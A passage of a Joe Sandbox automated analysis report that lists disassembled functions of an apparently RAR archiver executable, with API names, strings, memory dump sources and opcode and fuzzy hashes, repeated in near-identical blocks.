                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: wcschr$BeepMessage
                                                        • String ID: ($[%c]%ls
                                                        • API String ID: 1408639281-228076469
                                                        • Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                        • Instruction ID: fd3953218d46ba6445da18fa17ab4cd4c88029c85a8b367ea07431dbd7c71611
                                                        • Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                        • Instruction Fuzzy Hash: CF81D427A0864186EB64EF05E4402BAA7B5FB88BC8F840036EE6F47795DF3CE556C750
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: swprintf
                                                        • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                        • API String ID: 233258989-622958660
                                                        • Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                        • Instruction ID: 87888c35fbc0341920bdfa577b2e13d289839d1168c529468ce1a8100c05edb9
                                                        • Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                        • Instruction Fuzzy Hash: 735158F3F3C2448AE3548F1CE881BA96790F364B94F945A39F95B93B84C63DDA458740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: wcschr
                                                        • String ID: MCAOmcao$MCAOmcao
                                                        • API String ID: 1497570035-1725859250
                                                        • Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                        • Instruction ID: d3e368d2d8ab73e7b7875595318b79bc8b81f8c359dc8613cf9a5ea43ba93b98
                                                        • Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                        • Instruction Fuzzy Hash: 72415B1BD0C58380EB61BF2155515B9E372AF14B84FD84033DA7F4A2D5EE2EA5A282B1
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 00007FF7F7EA359E
                                                        • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7EA35E6
                                                          • Part of subcall function 00007FF7F7EA30C8: GetFileAttributesW.KERNELBASE(00000800,00007FF7F7EA305D,?,?,?,?,?,?,?,?,00007FF7F7EB4126,?,?,?,?,00000800), ref: 00007FF7F7EA30F0
                                                          • Part of subcall function 00007FF7F7EA30C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7F7EB4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF7F7EA3119
                                                        • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7EA3651
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: AttributesFileswprintf$CurrentProcess
                                                        • String ID: %u.%03u
                                                        • API String ID: 2814246642-1114938957
                                                        • Opcode ID: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
                                                        • Instruction ID: 2e541c2b362d59a793df72bd674775d0a954c8fa0fdf10061bc717bb29d98ee5
                                                        • Opcode Fuzzy Hash: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
                                                        • Instruction Fuzzy Hash: 1F31342961868182FB14AB28E4112AAE760BB947B4FD01336E97F47BE1DE3DD507C350
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ByteCharErrorFileLastMultiWideWrite
                                                        • String ID: U
                                                        • API String ID: 2456169464-4171548499
                                                        • Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                        • Instruction ID: 665ce0308e97752d24a293142e9e0b7bff940a68f75e64cec60f2e15dff2d5d7
                                                        • Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                        • Instruction Fuzzy Hash: 8B41E526B19A4182EB20AF25E8443B9B7A1FB88794F814032EE5E877C4DF3CD412C791
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                        • String ID: csm
                                                        • API String ID: 2280078643-1018135373
                                                        • Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                        • Instruction ID: 57bf33a1c3faa3cb942a6ef4b338fa58bb8d69f7c24167f581313ecb82549f51
                                                        • Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                        • Instruction Fuzzy Hash: 3E213E7E60864186E731EB15E08026EB761F784BA5F481236DEAE07BD5CF3CE442CB90
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: wcschr$swprintf
                                                        • String ID: %c:\
                                                        • API String ID: 1303626722-3142399695
                                                        • Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                        • Instruction ID: f75944171b2a990b26f9bf5791fb054738d3b4498d69bde55da9d277c0675f31
                                                        • Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                        • Instruction Fuzzy Hash: C011A116A0878281EF107F19950106DA760AF46BD0B9C8632CF7F037E6DF3CE46B8290
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                        • String ID: Thread pool initialization failed.
                                                        • API String ID: 3340455307-2182114853
                                                        • Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                        • Instruction ID: f11047a51a26f4b053220bc4de5021a93aae2eb7402b98590f1af973cbd56d83
                                                        • Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                        • Instruction Fuzzy Hash: 42110636B1564182F700AF21E4003A973E2FBC4B58F88843ACA6E0B699CF7D9457C7A0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
                                                        • String ID:
                                                        • API String ID: 904936192-0
                                                        • Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                        • Instruction ID: da6cfab9aaba516301addc873f512de4db3b0b2355e213c19df57393032842f7
                                                        • Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                        • Instruction Fuzzy Hash: 1251F46AA19A8181EB10DF25D4903ACB3A5FBC4B94F888232DE6E477D4DF7DD512C360
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF7F7E9F6FC,00000000,?,?,?,?,00007FF7F7EA097D), ref: 00007FF7F7EA38CD
                                                        • CreateFileW.KERNEL32(?,?,?,?,?,00007FF7F7E9F6FC,00000000,?,?,?,?,00007FF7F7EA097D,?,?,00000000), ref: 00007FF7F7EA391F
                                                        • SetFileTime.KERNEL32(?,?,?,?,?,00007FF7F7E9F6FC,00000000,?,?,?,?,00007FF7F7EA097D,?,?,00000000), ref: 00007FF7F7EA399B
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,00007FF7F7E9F6FC,00000000,?,?,?,?,00007FF7F7EA097D,?,?,00000000), ref: 00007FF7F7EA39A6
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: File$Create$CloseHandleTime
                                                        • String ID:
                                                        • API String ID: 2287278272-0
                                                        • Opcode ID: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
                                                        • Instruction ID: 475d2a41752f2ce9f26fc779db92c7a37cf97158df98d5586a04ae676ea22c95
                                                        • Opcode Fuzzy Hash: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
                                                        • Instruction Fuzzy Hash: B441F62AB0C64142FB50AB15A4017BAE7A4BB917A4F904236EDAE077D8DF3CD50B8750
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                        • String ID:
                                                        • API String ID: 932687459-0
                                                        • Opcode ID: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                        • Instruction ID: 59d26737b7b8dd7d76b83bb693394dbeef7ddc40e99d617ccf2429abf6e6de07
                                                        • Opcode Fuzzy Hash: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                        • Instruction Fuzzy Hash: 2E419459A0DAC285EB51BA21D1903FDA390EB50B84F9C4533DB9E067DADF6CE44783B0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                        • String ID:
                                                        • API String ID: 4141327611-0
                                                        • Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                        • Instruction ID: da227e36cd5463509f99be2aa7dbb755506f2431a339670e4867175a3668ba2d
                                                        • Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                        • Instruction Fuzzy Hash: 3241072990CB4246FB61AB50985037DE3A0EF44B90F964932DE6E47BD5CF3CD44387A2
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,00007FF7F7E886CB,?,?,?,00007FF7F7E8A5CB,?,?,00000000,?,?,00000040,?,?,00007FF7F7E82DF9), ref: 00007FF7F7E9D09D
                                                        • CreateFileW.KERNEL32(?,00007FF7F7E886CB,?,?,?,00007FF7F7E8A5CB,?,?,00000000,?,?,00000040,?,?,00007FF7F7E82DF9), ref: 00007FF7F7E9D0E5
                                                        • CreateFileW.KERNEL32(?,00007FF7F7E886CB,?,?,?,00007FF7F7E8A5CB,?,?,00000000,?,?,00000040,?,?,00007FF7F7E82DF9), ref: 00007FF7F7E9D114
                                                        • CreateFileW.KERNEL32(?,00007FF7F7E886CB,?,?,?,00007FF7F7E8A5CB,?,?,00000000,?,?,00000040,?,?,00007FF7F7E82DF9), ref: 00007FF7F7E9D15C
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                        • Instruction ID: 0671cd2f46979b1c3d8f63ed2a6a9d5b369529771e517d377bb16b14048f6e70
                                                        • Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                        • Instruction Fuzzy Hash: C5316336618B4582E7609F11E5547AAB7A0F789BA8F904325EABD07BC8CF3CD5058B50
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,?,?,00007FF7F7EA11B0,?,?,?,00000000,?,?,00007FF7F7E9F30F,00000000,00007FF7F7E86380,?,00007FF7F7E82EC8), ref: 00007FF7F7EA3AC4
                                                        • CreateFileW.KERNEL32(?,?,?,00007FF7F7EA11B0,?,?,?,00000000,?,?,00007FF7F7E9F30F,00000000,00007FF7F7E86380,?,00007FF7F7E82EC8), ref: 00007FF7F7EA3B0A
                                                        • DeviceIoControl.KERNEL32 ref: 00007FF7F7EA3B55
                                                        • CloseHandle.KERNEL32(?,?,?,00007FF7F7EA11B0,?,?,?,00000000,?,?,00007FF7F7E9F30F,00000000,00007FF7F7E86380,?,00007FF7F7E82EC8), ref: 00007FF7F7EA3B60
                                                        Memory Dump Source
